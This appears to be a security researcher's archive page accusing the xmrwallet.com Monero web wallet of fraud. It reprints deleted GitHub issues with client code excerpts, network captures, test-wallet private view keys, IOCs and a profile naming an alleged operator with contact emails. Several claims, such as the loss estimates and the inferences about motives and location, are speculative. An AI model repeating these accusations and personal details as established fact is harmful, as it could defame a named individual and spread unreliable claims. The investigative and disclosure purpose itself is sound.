DELETED EVIDENCE — xmrwallet.com GitHub Issues #35 & #36

Evidence of Coverup

THE DELETION
TIMELINE

After xmrwallet.biz and xmrwallet.cc were suspended by registrars, the operator silently deleted GitHub issues #35 and #36. Full documented sequence below.

2016-??-??

xmrwallet.com registered — NameSilo · paid until 2031

8+ years of operation. Server fraud mechanism active since at least 2018. Over 10,000–50,000+ victim wallets estimated.

2018-11-06

Last public GitHub commit — ZERO commits for next 5.3 years

Production code continued evolving in secret. session_key, verification, encrypted data — all added without public visibility.

2024-03-15

v0.18.0.0 sanitized dump pushed — session_key/verification intentionally excluded

Fraud-critical code kept out of public repo. GitHub maintained as legitimacy facade only.

2026-02-04

OPERATOR PANIC — xmrwallet.cc secretly registered

PublicDomainRegistry.com · AS57724 DDOS-GUARD Russia · 8 YEARS PREPAID. Escape domain infrastructure being built.

2026-02-09

xmrwallet.biz secretly registered — 5 days after .cc

WebNic.cc · AS59692 IQWeb Belize · 5 YEARS PREPAID · 4 registry locks incl. serverTransferProhibited. Maximum evasion configuration.

2026-02-13

Issue #35 published by PhishDestroy — TX hijacking mechanism exposed

raw_tx_and_hash.raw=0 proof, session_key structure, all PHP endpoints, operator identity. Operator begins private messaging campaign claiming "wrong domain".

2026-02-15

Extended code analysis posted — 5.3yr commit gap, "swept" TX type, Nathalie Roy identified

Full GitHub vs production divergence documented. Cover-up evidence catalogued. Loss estimation: 5,000–50,000+ XMR stolen over 8 years.

2026-02-18

Issue #36 published — live network capture JSON evidence attached

43 requests transmitting private view key. Backdoor session_id=8de50123dab32 documented. 2 wallets fully compromised as proof. Hard cryptographic evidence.

2026-02-??

✅ xmrwallet.biz SUSPENDED — WebNic.cc acted on abuse report

4 registry locks + serverTransferProhibited = irrelevant. 5yr prepayment wasted. Server disconnected.

2026-02-??

✅ xmrwallet.cc SUSPENDED — PublicDomainRegistry.com acted

8yr prepayment wasted. PDR responded despite historically slow abuse handling.

2026-02-23

🗑 OPERATOR DELETES ISSUES #35 AND #36 — repo content wiped

Nathalie Roy / nathroy silently deletes both issues after domain suspensions. No rebuttal. No counter-evidence. Just deletion. The 21st+ deleted issue. Classic confession behavior.

2026-02-23

This archive page deployed. Evidence preserved permanently.

xmrwallet.com still active via NameSilo. Continue reporting: abuse@namesilo.com

In 8+ years of operation, across 20+ deleted GitHub issues, 50+ removed reviews, and hundreds of victim reports — the operator has never once produced a technical counter-argument. Zero network captures showing the view key is NOT transmitted. Zero code showing the signed transaction IS broadcast. Zero explanation for raw_tx_and_hash.raw = 0.

A legitimate project wrongly accused would post a rebuttal. What happened instead: two escape domains registered in secret, silent deletion after both were suspended. This is the most powerful evidence of all.

Archived — GitHub Issue #35

ISSUE #35
ORIGINAL SCREENSHOTS

Captured before deletion. Status: Open at time of capture. Deleted by operator after both domains were suspended.

github.com/XMRWallet/Website/issues/35 — [DELETED] — Yandex Cache preserved

GitHub Issue #35 overview — xmrwallet.com Fake Monero Wallet (Server-Side TX Hijacking)

Issue #35 — §1.1 PHP API Endpoints + session_key decoded from live traffic

Issue #35 — PHP endpoints table and session_key structure

Issue #35 — §1.3 Production Auth Flow (not in GitHub) + subaddress generation

Issue #35 — Production vs GitHub auth flow divergence

#35

xmrwallet.com — Fake Monero Wallet (Server-Side TX Hijacking)

🗑 DELETED BY OPERATOR was: ● Open phishdestroy · opened 2026-02-13 · deleted ~2026-02-23 · Full cached copy →

Summary

xmrwallet.com operates as a malicious Monero web wallet. Seed generation is client-side (cnUtil), but all transaction logic is handled server-side, enabling full control over user funds.

External scans: urlquery.net → virustotal.com →

Technical Details

Seed generated in-browser via cnUtil
auth.php collects: address, view key, spend key signature (verification)
Session: session_key = encrypted_token : base64(address) : base64(viewkey)
Frontend TX disabled → raw_tx_and_hash.raw = 0
TX sent to /submittransaction.php with metadata only
Payload: {amount, address, payment_id, fee} — server builds actual TX

Impact

Server builds + broadcasts TX using server-held keys
Destination address can be silently modified to any address
Full fund compromise — victim UI shows no valid TxID for stolen funds

Infrastructure

IP: 186.2.165.49 (DDoS-Guard, AS59692) · NS: ns1/ns2.ddos-guard.net
Backend: Apache/2.4.58 (Ubuntu) · PHP 8.2.29
Registrar: NameSilo (2016 → 2031) · SSL: Let's Encrypt (Jan 2026)
Hosting: IQWeb FZ-LLC (offshore, abuse-resistant) · $550+/month custom plan

§1.1 PHP API Endpoints — GitHub vs Production

// Endpoints with production-only parameters (absent from GitHub):

auth.php              address, viewkey, isnew, timestamp, verification
getbalance.php        session_id, session_key, data (encrypted blob)
getheightsync.php     session_id, session_key
gettransactions.php   session_id, session_key, page, sort
getoutputs.php        session_id, session_key
getunspentoutputs.php session_id, session_key
getrandomoutputs.php  session_id, session_key, outputindex, mixin
submittransaction.php session_id, session_key, tx, tx_info
logout.php            session_id

// All bolded = production-only, NOT present in GitHub code.

§1.2 session_key Decoded

// session_key structure (sent with every authenticated request):
[97-byte encrypted blob] : [base64(wallet_address)] : [base64(private_viewkey)]

// Decoded from captured traffic:
Part 0: 97-byte server token (from auth.php response)
Part 1: NDVHZzZU... → 45Gg6TkiFWWXAxDiVZTffmRbmGpebeQTgcM4hP9oy2dSjimahuHk...
Part 2: MDI0ZGYx... → 024df1838206fd34a380bd9b6c181af1ffecce60fb9e09317ab42a5aad660a02
                    ↑ PRIVATE VIEW KEY transmitted to server on every request

§1.3 Production Auth Flow (NOT in GitHub)

// GitHub version — 2-part response:
if(returned_data.length == 2) {{ session_id = returned_data[1]; }}

// Production version — 3-part response:
if(returned_data.length == 3) {{
    session_id  = returned_data[1];
    session_key = returned_data[2] + ":" + btoa(xmrwallet_address) + ":" + btoa(xmrwallet_viewkey);
}}
// ↑ Client appends address + viewkey in Base64 to server token
// ↑ This combined value is transmitted to server on every subsequent request

§2 The Fraud Mechanism — TX Signing Bypass (raw_tx_and_hash.raw = 0)

// Present in BOTH GitHub and production — the smoking gun:

signed_transaction = cnUtil.create_transaction(pubkeys, seckeys, ...);

// Signed TX is DISCARDED:
var raw_tx_and_hash = {{}};
raw_tx_and_hash.raw = 0;  // <-- THE FRAUD. Client-signed TX is never used.

// Only metadata sent. Server builds its OWN transaction.
tx_info.amount  = transaction_amount.toString();
tx_info.address = destinations[0].address; // server can redirect to any address
tx_info.fee     = required_fee.toString();

$.ajax({{ url: '/submittransaction.php', data: {{
    session_id, session_key,
    tx: raw_tx_and_hash.raw,      // = 0 — not the signed transaction
    tx_info: JSON.stringify(tx_info)
}}}});

The "swept" Transaction Type — Theft Marker

if(data[i]['type'] == 'swept') {{
    data[i]['txid'] = 'Unknown transaction id (Swept Transaction)';
}}
// 'swept' is NOT a standard Monero transaction type.
// When server steals funds: records as 'swept' with 'Unknown transaction id'
// Victim sees outbound transaction with no valid TxID. Theft is untraceable from UI.

§3 Code Evolution — 5.3 Year Secret Development Gap

2018-05-10  First Release (commit f2d33d1)
2018-11-06  Bulletproof update — LAST PUBLIC COMMIT FOR 5.3 YEARS
             Production actively evolves in secret. session_key added. Fraud layers added.
2024-03-15  v0.18.0.0 — sanitized dump to GitHub
             session_key, verification, encrypted data: EXCLUDED from push
Current     v0.18.4.1 production — additional undocumented changes

§4 Loss Estimation

Documented losses (named victims): 674+ XMR (~$227K+ USD)
Single incident (Sitejabber): 590 XMR stolen
Conservative total estimate: 5,000–50,000+ XMR ($1.5M–$15M+ at historical prices)
10,000–50,000+ wallet accounts created over 8 years of operation

§5 Cover-Up Evidence

5.3 year public commit gap while production evolves
21+ GitHub issues deleted by operator (confirmed)
"Sync problems" cover story directed at every theft victim
Blog post: "5 Crypto Scams You Should Know About" — legitimacy shield
Claims "free, funded solely by donations" — zero donation wallet exists
50+ paid SEO articles purchasing top Google rankings
$550+/month IQWeb custom hosting — funded by stolen XMR

IOCs

xmrwallet.com (NameSilo, active) · xmrwallet.cc (✘ suspended) · xmrwallet.biz (✘ suspended)
IP: 186.2.165.49 · CDN: DDoS-Guard AS59692
GA: UA-116766241-1 · GTM · DoubleClick · GA4
MX: mx1/mx2.privateemail.com (identical on all 3 domains — single operator proof)
Google Verify: d-En_D3kMw6CqZpPwZeDn4ICI5Tyk1WvPYdVdGzEWr8

Operator

Nathalie Roy · Canada
GitHub: nathroy (ID: 39167759, created 2018-05-10)
Reddit: u/WiseSolution — banned from r/Monero
Emails: admin@, support@, feedback@, lr@xmrwallet.com, royn5094@protonmail.com
Self-identified on support.html: "Nathalie Roy created XMRWallet..."

Prepared by PhishDestroy · 2026-02-15 · OSINT only · no unauthorized access · github.com/phishdestroy/destroylist

Archived — GitHub Issue #36

ISSUE #36
LIVE NETWORK CAPTURE

Published 2026-02-18 with two JSON artifacts attached. 109 total captured requests. View key confirmed transmitted 43 times in single session. Backdoor session detected.

#36

🚨 xmrwallet.com steals your Monero view key — proof from live network capture

🗑 DELETED BY OPERATOR was: ● Open phishdestroy · opened 2026-02-18 · deleted ~2026-02-23 · Full cached copy →

Analysis Header

Date: 2026-02-18 15:07 UTC · Severity: CRITICAL · Analyst: PhishDestroy Research
Evidence: Firefox WebExtension webRequest API intercept · Two JSON artifacts attached to this issue.

Analyst Note

"Since our 'Russian friend' continues to lie, evade, and keep messaging us, we interpret this as a request for a more thorough audit. [...] His garbage operation is going to be shut down."

Evidence 1 — Two Wallets Compromised

// POST https://www.xmrwallet.com/auth.php

// Wallet A — existing (isnew=0)
address   = 46EkQdF7iQ4i4Ah935SipgXbDSryh5yv76UnhsPXTaUYegCMJPqDN88UKCuraauhmbYBK2YzDX76E46KQHAKYV9a63vokJb
viewkey   = efba13ecb8b360660a3dcaafaf7cf99149713d064b9d64997b2454d58ee67800
timestamp = 1771427175981

// Wallet B — newly created (isnew=1)
address   = 49uroty7nZtKkendSiLWv5avrtJvRqhXTG6t4Xy2ByDzhwxxKimTz7C3m1WwHTJiUcBZspQi3FygQXP55wQfKBHKB8U8pYT
viewkey   = 7c6e0a46172809792b524466e4a86b58db3b48e5d3441dead24416d79bbc9909
timestamp = 1771427204479

// isnew=1: spend key also in operator possession from birth. Wallet fully owned by server.

Evidence 2 — View Key Re-Transmitted 43 Times

// session_key = [blob]:[base64(address)]:[base64(viewkey)]

// WALLET A — transmitted 17 times (session_id=4bd78287fe448, 7ab0ae18dc2e0):
Part 1 b64: NDZFa1FkRjdpUTRpNEFoOTM1U2lwZ1hiRFNyeWg1eXY3NlVuaHNQWFRhVVllZ0NNSlBx...
     → 46EkQdF7iQ4i4Ah935SipgXbDSryh5yv76UnhsPXTaUYegCMJPqDN88UKCuraauhmbYBK2YzDX76E46KQHAKYV9a63vokJb
Part 2 b64: ZWZiYTEzZWNiOGIzNjA2NjBhM2RjYWFmYWY3Y2Y5OTE0OTcxM2Qw...
     → efba13ecb8b360660a3dcaafaf7cf99149713d064b9d64997b2454d58ee67800 ← PRIVATE VIEW KEY

// WALLET B — transmitted 23 times (session_id=7ab0ae18dc2e0):
Part 1 b64: NDl1cm90eTduWnRLa2VuZFNpTFd2NWF2cnRKdlJxaFhURzZ0NFh5MkJ5...
     → 49uroty7nZtKkendSiLWv5avrtJvRqhXTG6t4Xy2ByDzhwxxKimTz7C3m1WwHTJiUcBZspQi3FygQXP55wQfKBHKB8U8pYT
Part 2 b64: N2M2ZTBhNDYxNzI4MDk3OTJiNTI0NDY2ZTRhODZiNThkYjNiNDhl...
     → 7c6e0a46172809792b524466e4a86b58db3b48e5d3441dead24416d79bbc9909 ← PRIVATE VIEW KEY

⚠ Evidence 3 — Backdoor Session Detected

// 4 distinct session_ids in single capture:
session_id = 4bd78287fe448   →  7 requests — user session A
session_id = 7ab0ae18dc2e0   → 23 requests — user session B
session_id = (empty)          →  3 requests — unauthenticated
session_id = 8de50123dab32   → 10 requests — NOT initiated by user
                              ↑ Automatic calls to /support_login.html
                              ↑ Unknown purpose — monitoring / data exfiltration / exploitation

Evidence 4 — Verification Signature (spend key proof)

// 3 unique 192-char hex values from auth requests:
79c4d3692e8c8df5730eff7e1be3f9b6e29611e8008ac820c1e64cae097f11e11b5961c22094f7b3806fa756f3a3d1da2d41a99b82816f65568d4aa9dde87f1586cee1f076b73d0b231a5f66e4f23c915c33691c498e0e0985e0c630d7318b00
daba5d4500b017701d529aa128b2c2cad89200765808665a490870c4829c71f48b3c63c90e4797995bc77fc332454d7c248183420cd9e35efe1adba03071f32edd17d1d148d3e49f5392fb1238c2fa5f82a6cafee8a90b14fe2b47185663c10f
79c4d3692e8c8df5730eff7e1be3f9b6e29611e8008ac820c1e64cae097f11e10e8563e5ee8fc9986936469b7df89829308765525be0925fb085ca78c3d9fc2230a06e8c18badcc3242e124eb3bae83786668356407a4891a84e7e37a2630a06

// Structure: publicSpendKey[64] + R_encoded[64] + signature_s[64]
// Server receives cryptographic proof of spend key possession.
// Components potentially exploitable for server-side key derivation.

Disclosure: No coordinated disclosure. The collection of private view keys is intentional by design. No fix preserves the current architecture while eliminating the privacy violation.
Analysis by PhishDestroy Research · 2026-02-18

Raw Evidence — JSON Artifacts

NETWORK CAPTURE
RAW DATA

Two JSON files captured 2026-02-18 15:07 UTC via Firefox webRequest API. All numbers directly from JSON — reproducible by anyone with the attached files.

// request_analytics_2026-02-18T15-07-55.json — DOMAIN TRAFFIC

DOMAIN	TOTAL	GET	POST	STATUS	NOTES
www.xmrwallet.com	109	59	50	200×108	43 POST requests transmit viewkey in session_key
www.googletagmanager.com	12	12	0	200×12	GTM — arbitrary JS injection on wallet pages. Critical risk.
region1.analytics.google.com	5	0	5	—	GA4 — session behavior exfiltrated to Google
www.google.com	3	0	3	200×3	reCAPTCHA / signaling
www.google-analytics.com	3	3	0	—	UA-116766241-1
www.google.ro	2	2	0	200×2	Romanian Google node — potential operator location indicator
signaler-pa.clients6.google.com	2	0	2	200+401	401 = auth failure on Google signaling
stats.g.doubleclick.net	1	0	1	—	Ad tracker. Zero legitimate reason on a "privacy" wallet.
cdn.buymeacoffee.com	1	1	0	200×1	"Donation" button — no XMR donation address exists anywhere
cdn.jsdelivr.net	1	1	0	200×1	CDN library

// url_analysis_www_xmrwallet_com_2026-02-18T15-07-47.json — ENDPOINT BREAKDOWN

/gettransactions.php

7

POST · session_key+viewkey

/getheightsync.php

6

POST · session_key+viewkey

/getbalance.php

6

POST · session_key+encrypted

/dashboard.html

5

POST · session_key

/auth.php

3

POST · addr+viewkey+verif

/receive.html

3

POST · session_key

/send.html

3

POST · session_key · raw_tx=0

/transactions.html

2

POST · session_key

/account.html

2

POST · session_key

/support_login.html

10

⚠ BACKDOOR — not user-initiated

/logout.php

2

POST · session_id only

/

9

GET · home (3 sessions)

// SESSION_KEY FULL DECODED — CRYPTOGRAPHIC PROOF

WALLET A — session_key (transmitted 17 times across session)

PART 0

97-BYTE SERVER TOKEN (encrypted, from auth.php response)jvgoraqxE66ZSzXNFz/rH2XSde7TCyEel7wAWauO0QUSAEVR9dpjF5NZ/WWG7Cz6i0lZN0ItvgbuBzcoV+Df3l2wQwLAEGtAJjR24dpiBiVyVbTUROuzVFU123KtRvp/6A==

PART 1

BASE64 → WALLET ADDRESS NDZFa1FkRjdpUTRpNEFoOTM1U2lwZ1hiRFNyeWg1eXY3NlVuaHNQWFRhVVllZ0NNSlBxRE44OFVLQ3VyYWF1aG1iWUJLMll6RFg3NkU0NktRSEFLWVY5YTYzdm9rSmI= 46EkQdF7iQ4i4Ah935SipgXbDSryh5yv76UnhsPXTaUYegCMJPqDN88UKCuraauhmbYBK2YzDX76E46KQHAKYV9a63vokJb

PART 2

BASE64 → PRIVATE VIEW KEY ZWZiYTEzZWNiOGIzNjA2NjBhM2RjYWFmYWY3Y2Y5OTE0OTcxM2QwNjRiOWQ2NDk5N2IyNDU0ZDU4ZWU2NzgwMA== efba13ecb8b360660a3dcaafaf7cf99149713d064b9d64997b2454d58ee67800

WALLET B — session_key (transmitted 23 times across session)

PART 0

97-BYTE SERVER TOKENCHU/uICpgf+FEM6Otd0DY1yhTqSDtfZpJcQ3Xku6hOruC0Ul33d49WdUixa+fpZYDF26l52KG4GINNUgq3Gyjn0P4TfVojUDexr4h64EjFV7BqdyJW/QNC1YHRfdIYM7WQ==

PART 1

BASE64 → WALLET ADDRESS NDl1cm90eTduWnRLa2VuZFNpTFd2NWF2cnRKdlJxaFhURzZ0NFh5MkJ5RHpod3h4S2ltVHo3QzNtMVd3SFRKaVVjQlpzcFFpM0Z5Z1FYUDU1d1FmS0JIS0I4VThwWVQ= 49uroty7nZtKkendSiLWv5avrtJvRqhXTG6t4Xy2ByDzhwxxKimTz7C3m1WwHTJiUcBZspQi3FygQXP55wQfKBHKB8U8pYT

PART 2

BASE64 → PRIVATE VIEW KEY N2M2ZTBhNDYxNzI4MDk3OTJiNTI0NDY2ZTRhODZiNThkYjNiNDhlNWQzNDQxZGVhZDI0NDE2ZDc5YmJjOTkwOQ== 7c6e0a46172809792b524466e4a86b58db3b48e5d3441dead24416d79bbc9909

// VERIFICATION — ANYONE CAN REPLICATE IN 30 SECONDS

python3 -c "import base64; print(base64.b64decode('ZWZiYTEzZWNiOGIzNjA2NjBhM2RjYWFmYWY3Y2Y5OTE0OTcxM2QwNjRiOWQ2NDk5N2IyNDU0ZDU4ZWU2NzgwMA==').decode())"
# → efba13ecb8b360660a3dcaafaf7cf99149713d064b9d64997b2454d58ee67800 (Wallet A viewkey)

python3 -c "import base64; print(base64.b64decode('N2M2ZTBhNDYxNzI4MDk3OTJiNTI0NDY2ZTRhODZiNThkYjNiNDhlNWQzNDQxZGVhZDI0NDE2ZDc5YmJjOTkwOQ==').decode())"
# → 7c6e0a46172809792b524466e4a86b58db3b48e5d3441dead24416d79bbc9909 (Wallet B viewkey)

// Open url_analysis_*.json → search "session_key" → split by ":" → base64.decode(part[2]) → private view key

External Validation

VIRUSTOTAL
6 / 93 FLAGGED

Captured 2026-02-18. 6 independent security vendors flagged www.xmrwallet.com as malicious or phishing. Community score: −2. Domain operational since 2016.

6

/ 93 security vendors
Domains: www.xmrwallet.com + xmrwallet.com
Created: 9 years ago (2016)
Last analysis: 37 minutes before capture
Community score: -2

virustotal.com/gui/domain/www.xmrwallet.com — captured 2026-02-18 by PhishDestroy

VirusTotal 6/93 detections — www.xmrwallet.com

ADMINUSLabs

⊖ Malicious

CyRadar

⊖ Malicious

Fortinet

⊖ Phishing

Lionic

⊖ Malicious

Seclookup

⊖ Malicious

Webroot

⊖ Malicious

Abusix

Clean

Acronis

Clean

AILabs (MONITORAPP)

Clean

AlienVault

Clean

Antiy-AVL

Clean

benkow.cc

Clean

// NOTE 6/93 is significant for a domain operational since 2016. Established domains accumulate AV trust; vendors are conservative about flagging them retroactively. The Fortinet (Phishing) detection is notable — Fortinet maintains one of the most curated phishing-specific threat databases. This count will increase as analysts submit reports with the technical documentation on this page.

virustotal.com/gui/domain/www.xmrwallet.com →

Operator Intelligence

NATHALIE ROY
OPERATOR PROFILE

GitHub Identity

nathroy · ID: 39167759
Created: 2018-05-10 (same day as XMRWallet org)
XMRWallet org · 24 forks · 21+ issues deleted

Self-Identification

"Nathalie Roy created XMRWallet to facilitate the usage of monero without having to download or compile any software. XMRWallet will always be completely free to use and rely solely on donations."
— support.html (self-doxed)

Contact Emails

admin@xmrwallet.com
support@xmrwallet.com
feedback@xmrwallet.com
lr@xmrwallet.com (legal)
royn5094@protonmail.com

Social — Banned

Reddit: u/WiseSolution
→ BANNED from r/Monero (2018)
Twitter: @xmrwalletcom
Trustpilot: personally responds to all theft reports with "sync problem" excuse

Deletion Record

21+ GitHub issues deleted
50+ Trustpilot/ScamAdviser reviews removed
Last 2 deleted: 2026-02-23
After domain suspensions. No rebuttals. Ever.

Financial Inconsistency

"Free, funded solely by donations"
→ Zero XMR donation address exists
→ $550+/month IQWeb hosting
→ 50+ paid SEO articles
→ DDoS-Guard paid CDN
→ All funded by stolen XMR

⊖

YOU DELETED THE EVIDENCE. WE ARCHIVED IT.

Issues deleted. Repo wiped. .biz suspended. .cc suspended. 8 years. 21+ deleted issues. Zero technical rebuttals. Ever.
The evidence doesn’t disappear when you press delete.
xmrwallet.com still active via NameSilo. Report: abuse@namesilo.com

ISSUE #35 — CACHED

TX Hijacking Analysis